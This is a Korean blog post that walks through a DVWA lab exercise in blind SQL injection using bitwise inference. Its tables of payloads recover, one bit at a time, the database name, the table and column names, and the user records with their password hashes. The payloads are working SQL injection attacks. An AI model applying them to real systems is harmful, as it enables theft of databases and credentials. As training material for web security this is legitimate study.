Oh! JUN
[DVWA] SQL Injection 실습 (Low Level, blind+비트) 본문
1. DB 이름
| DB 이름 글자 수 | ||
| 1' and length(database())=4# | T | DB : □□□□ |
| DB 이름 | ||
| 1' and ascii(substring(database(),1,1))&1=1# | 0 | DB : d□□□ |
| 1' and ascii(substring(database(),1,1))&2=2# | 0 | |
| 1' and ascii(substring(database(),1,1))&4=4# | 1 | |
| 1' and ascii(substring(database(),1,1))&8=8# | 0 | |
| 1' and ascii(substring(database(),1,1))&16=16# | 0 | |
| 1' and ascii(substring(database(),1,1))&32=32# | 1 | |
| 1' and ascii(substring(database(),1,1))&64=64# | 1 | |
| 1' and ascii(substring(database(),1,1))&128=128# | 0 | |
| 01100100 → 100 → 'd' | ||
| 1' and ascii(substring(database(),2,1))&1=1# | 0 | DB : dv□□ |
| 1' and ascii(substring(database(),2,1))&2=2# | 1 | |
| 1' and ascii(substring(database(),2,1))&4=4# | 1 | |
| 1' and ascii(substring(database(),2,1))&8=8# | 0 | |
| 1' and ascii(substring(database(),2,1))&16=16# | 1 | |
| 1' and ascii(substring(database(),2,1))&32=32# | 1 | |
| 1' and ascii(substring(database(),2,1))&64=64# | 1 | |
| 1' and ascii(substring(database(),2,1))&128=128# | 0 | |
| 01110110 → 118 → 'v' | ||
| 1' and ascii(substring(database(),3,1))&1=1# | 1 | DB : dvw□ |
| 1' and ascii(substring(database(),3,1))&2=2# | 1 | |
| 1' and ascii(substring(database(),3,1))&4=4# | 1 | |
| 1' and ascii(substring(database(),3,1))&8=8# | 0 | |
| 1' and ascii(substring(database(),3,1))&16=16# | 1 | |
| 1' and ascii(substring(database(),3,1))&32=32# | 1 | |
| 1' and ascii(substring(database(),3,1))&64=64# | 1 | |
| 1' and ascii(substring(database(),3,1))&128=128# | 0 | |
| 01110111 → 119 → 'w' | ||
| 1' and ascii(substring(database(),4,1))&1=1# | 1 | DB : dvwa |
| 1' and ascii(substring(database(),4,1))&2=2# | 0 | |
| 1' and ascii(substring(database(),4,1))&4=4# | 0 | |
| 1' and ascii(substring(database(),4,1))&8=8# | 0 | |
| 1' and ascii(substring(database(),4,1))&16=16# | 0 | |
| 1' and ascii(substring(database(),4,1))&32=32# | 1 | |
| 1' and ascii(substring(database(),4,1))&64=64# | 1 | |
| 1' and ascii(substring(database(),4,1))&128=128# | 0 | |
| 01100001 → 97 → a | ||
| DB : 'dvwa' | ||
2. 테이블 이름
| Table 개수 | ||
| 1' and (select count(*) from information_schema.tables where table_schema='dvwa')=2# | T | |
| 1번째 Table의 문자 수 | ||
| 1' and length((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1))=9# | T | Table(1) : □□□□□□□□□ |
| 2번째 Table의 문자 수 | ||
| 1' and length((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1))=5# | T | Table(2) : □□□□□ |
| 1번째 Table의 이름 | ||
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1))&1=1# | 1 | Table(1) : g□□□□□□□□ |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1))&2=2# | 1 | |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1))&4=4# | 1 | |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1))&8=8# | 0 | |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1))&16=16# | 0 | |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1))&32=32# | 1 | |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1))&64=64# | 1 | |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1))&128=128# | 0 | |
| 01100111 → 103 → 'g' | ||
| ...생략 | ...생략 | ...생략 |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),9,1))&128=128# | 0 | Table(1) : guestbook |
| 2번째 Table의 이름 | ||
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1))&1=1# | 1 | Table(2) : u□□□□ |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1))&2=2# | 0 | |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1))&4=4# | 1 | |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1))&8=8# | 0 | |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1))&16=16# | 1 | |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1))&32=32# | 1 | |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1))&64=64# | 1 | |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1))&128=128# | 0 | |
| 01110101 → 117 → 'u' | ||
| ...생략 | ...생략 | ...생략 |
| 1' and ascii(substring((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),5,1))&128=128# | 0 | Table(2) : users |
| Table(1) : gusetbook, Table(2) : users | ||
3. 컬럼 이름
| 컬럼 개수 | ||
| 1' and (select count(*) from information_schema.columns where table_schema='dvwa' and table_name='users')=6# | 컬럼 6개 | |
| 1번째 컬럼 | ||
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1))&1=1# | 1 | Column(1) : u□□□□□□ |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1))&2=2# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1))&4=4# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1))&8=8# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1))&16=16# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1))&32=32# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1))&64=64# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1))&128=128# | 0 | |
| 01110101 → 117 → 'u' | ||
| ...생략 | ||
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),7,1))&128=128# | Column(1) : user_id | |
| 2번째 컬럼 | ||
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1),1,1))&1=1# | 0 | Column(2) : f□□□□□□□□□ |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1),1,1))&2=2# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1),1,1))&4=4# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1),1,1))&8=8# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1),1,1))&16=16# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1),1,1))&32=32# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1),1,1))&64=64# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1),1,1))&128=128# | 0 | |
| 01100110 → 102 → 'f' | ||
| ...생략 | ||
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1),10,1))&128=128# | Column(2) : first_name | |
| 3번째 컬럼 | ||
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1),1,1))&1=1# | 0 | Column(3) : l□□□□□□□□□ |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1),1,1))&2=2# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1),1,1))&4=4# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1),1,1))&8=8# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1),1,1))&16=16# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1),1,1))&32=32# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1),1,1))&64=64# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1),1,1))&128=128# | 0 | |
| 01101100 → 108 → 'l' | ||
| ...생략 | ||
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1),10,1))&128=128# | Column(3) : last_name | |
| 4번째 컬럼 | ||
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,1))&1=1# | 1 | Column(4) : u□□□ |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,1))&2=2# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,1))&4=4# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,1))&8=8# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,1))&16=16# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,1))&32=32# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,1))&64=64# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,1))&128=128# | 0 | |
| 01110101→ 117→ 'u' | ||
| ...생략 | ||
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),4,1))&128=128# | Column(4) : user | |
| 5번째 컬럼 | ||
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1),1,1))&1=1# | 0 | Column(5) : p□□□□□□□ |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1),1,1))&2=2# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1),1,1))&4=4# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1),1,1))&8=8# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1),1,1))&16=16# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1),1,1))&32=32# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1),1,1))&64=64# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1),1,1))&128=128# | 0 | |
| 01110000 → 112 → 'p' | ||
| ...생략 | ||
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1),8,1))&128=128# | Column(5) : password | |
| 6번째 컬럼 | ||
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1),1,1))&1=1# | 1 | Column(6) : a□□□□ |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1),1,1))&2=2# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1),1,1))&4=4# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1),1,1))&8=8# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1),1,1))&16=16# | 0 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1),1,1))&32=32# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1),1,1))&64=64# | 1 | |
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1),1,1))&128=128# | 0 | |
| 01100001→ 97→ 'a' | ||
| ...생략 | ||
| 1' and ascii(substring((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1),5,1))&128=128# | Column(6) : avator | |
| column(1) : user_id column(2) : first_name column(3) : last_name column(4) : user column(5) : password column(6) : avator |
||
4. 데이터
| 데이터 개수 | ||
| 1' and (select count(*) from dvwa.users)=5# | T | 데이터 개수 5개 |
| 데이터 문자 수 | ||
| 1' and length((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 0,1))=56# | T | 1번째 데이터의 문자 수 : 56 |
| 1' and length((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 1,1))=59# | T | 2번째 데이터의 문자 수 : 59 |
| 1' and length((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 2,1))=51# | T | 3번째 데이터의 문자 수 : 51 |
| 1' and length((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 3,1))=58# | T | 4번째 데이터의 문자 수 : 58 |
| 1' and length((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 4,1))=55# | T | 5번째 데이터의 문자 수 : 55 |
| 1번째 데이터 | ||
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 0,1),1,1))&1=1# | 1 | 데이터(1) : 1##□□... |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 0,1),1,1))&2=2# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 0,1),1,1))&4=4# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 0,1),1,1))&8=8# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 0,1),1,1))&16=16# | 1 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 0,1),1,1))&32=32# | 1 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 0,1),1,1))&64=64# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 0,1),1,1))&128=128# | 0 | |
| 00110001 → 49 → '1' | ||
| ...생략 | ||
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 0,1),56,1))&128=128# | 데이터(1) : 1##admin##admin##admin##5f4dcc3b5aa765d61d8327deb882cf99 | |
| 2번째 데이터 | ||
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 1,1),1,1))&1=1# | 0 | 데이터(2) : 2##□□... |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 1,1),1,1))&2=2# | 1 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 1,1),1,1))&4=4# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 1,1),1,1))&8=8# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 1,1),1,1))&16=16# | 1 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 1,1),1,1))&32=32# | 1 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 1,1),1,1))&64=64# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 1,1),1,1))&128=128# | 0 | |
| 00110010 → 50 → '2' | ||
| ...생략 | ||
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 1,1),59,1))&128=128# | 데이터(2) : 2##Gordon##Brown##gordonb##e99a18c428cb38d5f260853678922e03 | |
| 3번째 데이터 | ||
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 2,1),1,1))&1=1# | 1 | 데이터(3) : 3##□□... |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 2,1),1,1))&2=2# | 1 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 2,1),1,1))&4=4# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 2,1),1,1))&8=8# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 2,1),1,1))&16=16# | 1 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 2,1),1,1))&32=32# | 1 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 2,1),1,1))&64=64# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 2,1),1,1))&128=128# | 0 | |
| 00110011 → 51 → '3' | ||
| ...생략 | ||
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 2,1),51,1))&128=128# | 데이터(3) : 3##Hack##Me##1337##8d3533d75ae2c3966d7e0d4fcc69216b | |
| 4번째 데이터 | ||
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 3,1),1,1))&1=1# | 0 | 데이터(4) : 4##□□... |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 3,1),1,1))&2=2# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 3,1),1,1))&4=4# | 1 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 3,1),1,1))&8=8# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 3,1),1,1))&16=16# | 1 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 3,1),1,1))&32=32# | 1 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 3,1),1,1))&64=64# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 3,1),1,1))&128=128# | 0 | |
| 00110100 → 52 → '4' | ||
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 3,1),58,1))&128=128# | 데이터(4) : 4##Pablo##Picasso##pablo##0d107d09f5bbe40cade3de5c71e9e9b7 | |
| 5번째 데이터 | ||
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 4,1),1,1))&1=1# | 1 | 데이터(5) : 5##□□... |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 4,1),1,1))&2=2# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 4,1),1,1))&4=4# | 1 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 4,1),1,1))&8=8# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 4,1),1,1))&16=16# | 1 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 4,1),1,1))&32=32# | 1 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 4,1),1,1))&64=64# | 0 | |
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 4,1),1,1))&128=128# | 0 | |
| 00110101 → 53 → 5 | ||
| ...생략 | ||
| 1' and ascii(substring((select concat(user_id, '##', first_name, '##', last_name, '##', user, '##', password) from dvwa.users limit 4,1),55,1))&128=128# | 데이터(5) : 5##Bob##Smith##smithy##5f4dcc3b5aa765d61d8327deb882cf99 | |
| 데이터(1) : 1##admin##admin##admin##5f4dcc3b5aa765d61d8327deb882cf99 데이터(2) : 2##Gordon##Brown##gordonb##e99a18c428cb38d5f260853678922e03 데이터(3) : 3##Hack##Me##1337##8d3533d75ae2c3966d7e0d4fcc69216b 데이터(4) : 4##Pablo##Picasso##pablo##0d107d09f5bbe40cade3de5c71e9e9b7 데이터(5) : 5##Bob##Smith##smithy##5f4dcc3b5aa765d61d8327deb882cf99 |
||
*허리디스크 터져서 입원했다가 죽을뻔 했다.
'웹 해킹 > SQL Injection' 카테고리의 다른 글
| Response-Based SQL Injection 공격 실습 (0) | 2022.09.17 |
|---|---|
| 각 DBMS에 따른 Response-Based SQL 문법 테스트 (0) | 2022.09.17 |
| [DVWA] SQL INJECTION 실습 (Low Level) (0) | 2022.09.04 |
| 데이터 추론 기법(비트, ORACLE) 실습 (0) | 2022.09.01 |
| 데이터 추론 기법(비트, MYSQL) 실습 (0) | 2022.08.31 |
'웹 해킹/SQL Injection' Related Articles
more
